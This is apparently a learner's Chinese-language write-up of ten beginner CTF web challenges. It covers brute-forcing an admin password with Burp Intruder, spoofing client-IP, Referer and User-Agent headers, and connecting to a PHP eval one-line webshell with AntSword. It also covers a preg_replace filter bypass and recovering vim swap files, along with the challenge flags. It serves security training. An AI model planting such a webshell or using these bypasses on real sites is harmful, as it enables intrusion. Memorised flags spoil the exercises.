蚁景网安新手村10道题
晚上去做蚁景网安《CTF-WEB实战技能特训班》新手村的10道题,有些不会,搜半天找不到writeup,心累,记录一下吧。
01,EzLogin
1,进入,是一个登录框,随意输入用户名密码,提示“pls login as admin”。
2,用户名为admin,随意输入密码,“wrong password”。查看网页源代码,可以看到一段代码:
<!-- SSBoYXZlIG5vIFNRTA== -->base64->asii,I have no SQL
<!-- 7765616B -->hex->asii,weak
3,根据提示可知,是弱密码,可以用BurpSuite进行暴力破解。
Intrude->payloads模块,add from list可以选择“passwords"字典进行爆破。
4,破解得到密码:administrator,得到flag{Burp_Intruder_1s_UseFUll}。
02,canyouaccess
知识点,修改http文件头
1,打开页面,提示请从本地访问。将本地访问IP(20条)都沾上,提示,请从google.com访问
2,添加 referer: google.com,提示 请用 ABC Browser访问
3,修改User-Agent: ABC Browser
4,flag{HTTP_He4deR_c4n_b3_CoNtr0led}
5,也可使用hackbar插件做题。
<?php
$flag = "flag{HTTP_He4deR_c4n_b3_CoNtr0led}";
if ($_SERVER['HTTP_CLIENT_IP'] != '127.0.0.1'){
if ($_SERVER['HTTP_X_FORWARDED_FOR'] == "127.0.0.1") {
die("你以为我不知道X-Forwarded-For?");
}
die("请从本地访问");
}
if ($_SERVER['HTTP_REFERER'] != 'google.com')
die('请从google.com访问');
if ($_SERVER['HTTP_USER_AGENT'] != 'ABC Browser')
die('请使用ABC Browser');
echo $flag;
?>
03,chopper
1,点进页面,标题为Chopper & AntSword,内容是一串代码:
<?php @eval($_POST['a']); ?>
2,用蚁剑连接,网址:http://a.y1ng.vip:1126/chopper/ ,密码:a,能看到整个网站目录结构。逐目录查找,根目录下有一个flag文件夹,打开得到flag{07d12a5e-1649-fc7c-3e9f-e89243c0117e}
3,知识点:一句话木马
04,cookie
1,打开页面,查看源代码,都看不到有用信息。用BurpSuite进行抓包。
2,抓包没有有用信息,点击send,看到返回的cookie字段包含 fl4g.txt,直接访问,得到f14g.txt
05,employeeswork
<?php
include 'flag.php';
if (isset($_GET['source']) && $_GET['source'] == 'true') {
show_source(__FILE__);
exit;
}
if (isset($_GET['work'])) {
$what_is_your_attitude_of_your_work = $_GET['work'];
$what_you_say_can_gain_more_income = "y1ng_pretty_handsome";
$what_Precoce_de_Malingre_said = preg_replace(
"/$what_you_say_can_gain_more_income/",'', $what_is_your_attitude_of_your_work
);
if ($what_Precoce_de_Malingre_said === $what_you_say_can_gain_more_income) {
work_worthy();
}
}
?>
知识点:preg_replace()函数
根据题目可知,work参数,替换掉“y1ng_pretty_handsome”后,仍然等于“y1ng_pretty_handsome”,那就是将一个“y1ng_pretty_handsome”插入到另一个““y1ng_pretty_handsome”中,有多种写法,比如
访问网址:http://a.y1ng.vip:1126/employeeswork/index.php?work=y1ng_y1ng_pretty_handsomepretty_handsome
得到flag{iNput_R3pl4c3_i5_W3aK}
06,ezinclude
<?php
highlight_file(__FILE__);
error_reporting(0);
/*flag in flag.php*/
if (!isset($_POST['abc']))
die('i am abc, post it damn you');
if (strpos($_POST['abc'],"http"))
die('fxck ur rf1 out of shit');
if (strpos($_POST['abc'],"hello123"))
die('i am abc! you fxcking hacker');
if (file_get_contents($_POST['abc']) != 'hello123' )
die('file get contents! FILE! GET! CONTENTS!');
include($_POST['file']);
没做出来,也没搜索到
07,ezsearch
1,打开网页,看到“where is flag“。
2,查看源代码,在最下面看到flag{1st_st3p_SH0w_s0uRce}。
08,robots
1,打开,看到一段文字“听说狗东仓库使用robots配货”。
2,访问robots.txt文件,得到如下提示:
User-agent: *
Disallow:
/robot-nurses
/flag.htmlw
3,访问flag.html文件,得到“no~"
4,访问robot-nurses,最下方得到Y1ng{R0bots_m4ke_u_Kn0w_s0m3th1ng}。下回还是f12查看吧。
09,vim
1,页面提示“I wrote this page by vim!”
2,vim意外退出时,自动生成备份文件 .文件名.swp 文件,第二次生成swo,第三次生成 swn文件。
3,访问 .index.php.swp ,自动下载文件,txt打开,得到flag{v1m_b4ckup_swp_aNd_~}
10,wtfbutton
1,看到一个flag按钮,但是不能点击。F12查看源代码,看到输入框有限制:
<input disabled="" class="btn btn-default" style="height:50px;width:200px;" type="submit" value="flag" name="auth">
2,将 disabled="" 删除后,按回车运行,得到Y1ng{E1em3nt_123s_Us3fulll}。